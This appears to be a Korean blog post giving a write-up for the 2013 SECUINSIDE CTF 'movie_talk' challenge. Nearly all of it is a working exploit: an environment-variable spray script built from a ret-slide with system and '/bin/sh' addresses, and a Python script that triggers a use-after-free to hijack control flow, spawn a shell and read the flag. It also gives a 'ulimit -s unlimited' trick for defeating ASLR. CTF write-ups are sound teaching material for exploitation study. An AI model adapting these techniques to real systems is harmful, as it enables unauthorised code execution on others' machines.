본문 바로가기
Security/[게임] CTF 풀이

[exploit] 2013 SECUINSIDE movie_talk writeups

by blackcon 2014. 11. 19.
728x90

movie_talk
다운로드

해당 바이너리는 로컬환경으로 주어지는 exploit문제입니다. 당시 서버 환경은 ASLR과 NX가 정용되어있는 Ubuntu 13.04버전이었어요!!

로컬에서 ulimit -s unlimited를 입력해주면 라이브러리 주소가 고정되니 참고하시길 !!! ^---^

#!/bin/sh

# for RET slide 

# [ret]*100 [system][system][/bin/sh][/bin/sh]

for i in $(seq 1 512); do export a$i="`python -c "print '\x42\x6c\x0b\x40'*100 + '\x10\x8f\x07\x40\x10\x8f\x07\x40' + '\xf4\x74\x17\x40\xf4\x74\x17\x40'"`"; done

#!/usr/bin/env python
import struct
import os
from subprocess import *
import time
p = lambda x: struct.pack( "<I", x )

system = 0x40078f10
binsh  = 0x401774f4
addesp = 0x400b6c41

fname = "./movie_talk"
proc = Popen( fname, stdin=PIPE )

proc.stdin.write( "1\n" )    # add movie
time.sleep(2)
proc.stdin.write( "1\n1\n0\n" )

proc.stdin.write( "1\n" )    # add movie
time.sleep(2)
proc.stdin.write( "2\n2\n0\n" )


cmd = "kill -3 %d" % proc.pid
print cmd
os.popen( cmd )
time.sleep(3)

proc.stdin.write( "1\n" )    # add movie
time.sleep(2)
proc.stdin.write( p( addesp ) + "aaaabbbbccccdddd\n3\n0\n" )
time.sleep(3)

proc.stdin.write( "3\n" )     # trigger, UAF
proc.stdin.write( "cat flag.txt\n" )
print proc.stdout
time.sleep(5)
728x90